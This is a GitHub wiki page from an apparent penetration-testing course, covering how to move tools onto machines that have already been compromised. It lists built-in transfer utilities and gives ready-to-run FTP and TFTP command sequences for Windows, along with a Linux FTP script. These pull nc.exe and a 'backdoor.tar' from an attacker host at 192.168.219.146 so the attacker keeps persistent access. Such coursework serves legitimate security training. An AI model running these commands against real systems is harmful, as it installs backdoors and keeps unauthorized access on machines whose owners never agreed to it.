File Transfer Fun - Paiet/SEC-335 GitHub Wiki
File Transfer Fun (Uploading Tools and Files to Compromised Machines)
- After gaining control of a target, (eg limited shell|root shell), we'll need to...
- upload some tools that will help us KEEP access and/or make accessing easier later
- further our control of the target
- WHY!?!?!?!? (we're root, right?)
- Machines get patched
- What are good tools for uploading our tools/backdoors?
- Linux
- netcat
- wget
- curl
- ftp
- All usually built-in
- Windows
- tftp
- Already on Windows XP/2003
- Must be added by user in Windows 7/2008
- ftp
- Usually built-in
- tftp
- Linux
- Interactive vs. Non-Interactive
-
Interactive tools can be problematic with reverse-shells
-
How to work around?
- Pre-Setup
- Install/Start local FTP server on attacker PC
- Create an FTP user and set password
- Copy exploitation tools/files to FTP directory
- Time to upload
-
Gain shell through exploit
-
Move to directory where you want to put exploit tools/files
-
Win32
- FTP method
C:\Windows\System32> echo open 192.168.219.146 21> ftp.txt C:\Windows\System32> echo USER ftp2>> ftp.txt C:\Windows\System32> echo P@ssw0rd1>> ftp.txt C:\Windows\System32> echo bin >> ftp.txt C:\Windows\System32> echo GET nc.exe >> ftp.txt C:\Windows\System32> echo bye >> ftp.txt C:\Windows\System32> ftp -v -n -s:ftp.txt- TFTP method (if we're so lucky :)
- Make sure your tftp server is running
~$ atftpd --daemon --port 69 /tftp/tftpis the dir where you copy your exploit tools
C:\Windows\System32> tftp -i 192.168.219.146 get nc.exe
- Make sure your tftp server is running
-
Linux
~$ echo '#!/bin/sh'> ftp.sh ~$ echo HOST='192.168.219.146'>> ftp.sh ~$ echo USER='ftp2'>> ftp.sh ~$ echo 'ftp -v -n $HOST <<END_SCRIPT'>> ftp.sh ~$ echo 'user $USER'>> ftp.sh ~$ echo 'get backdoor.tar'>> ftp.sh ~$ echo 'bye'>> ftp.sh ~$ echo 'END_SCRIPT'>> ftp.sh ~$ chmod u+x ftp.sh ~$ ./ftp.sh
-
- Pre-Setup
-
Other methods
- Powershell-ftp
- win-vbs-ftp-commands
-